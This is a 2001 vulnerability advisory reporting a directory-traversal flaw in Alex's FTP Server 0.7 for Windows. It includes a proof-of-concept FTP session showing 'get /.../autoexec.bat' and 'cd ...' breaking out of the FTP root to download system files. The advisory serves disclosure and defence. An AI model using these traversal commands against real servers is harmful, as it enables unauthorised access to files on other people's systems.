Reported April 28, 2001, by Joe Testa.
VERSION AFFECTED
-
Alex’s FTP Server 0.7 for Windows 2000, Windows NT, and Windows 9x
DESCRIPTION
A
vulnerability exists that lets an attacker break out of an FTP root. For
example, an attacker can access the root directory where the FTP server is
running by connecting to a vulnerable host and issuing the command cd … An
attacker can also use relative paths to download files outside of an FTP root.
DEMONSTRATION
Joe Testa provided the following proof-of-concept scenario:
The following is an illustration of the problem. An ftp root of
'c:\directory\directory' was used:
Connected to xxxxxxxxxx.rh.rit.edu.
220 xxxxxxxxxx FTP version 0.7 ready at Fri Apr 20 23:17:32 2001
User (xxxxxxxxxx.rh.rit.edu:(none)): jdog
331 Enter PASS command
Password:
230 Logged in
ftp> get /.../autoexec.bat
200 Port command okay
150 Opening data connection for retr "/.../autoexec.bat"
226 Transfer complete
ftp: 411 bytes received in 0.00Seconds 411000.00Kbytes/sec.
ftp> cd ...
257 "/.../" is current directory
ftp> get command.com
200 Port command okay
150 Opening data connection for retr "/.../command.com"
226 Transfer complete
ftp: 85 bytes received in 0.00Seconds 85000.00Kbytes/sec.
ftp>
VENDOR RESPONSE
The vendor, Alex Linde, has been notified. However, no workaround or fix is currently available.
CREDIT
Discovered by Joe
Testa.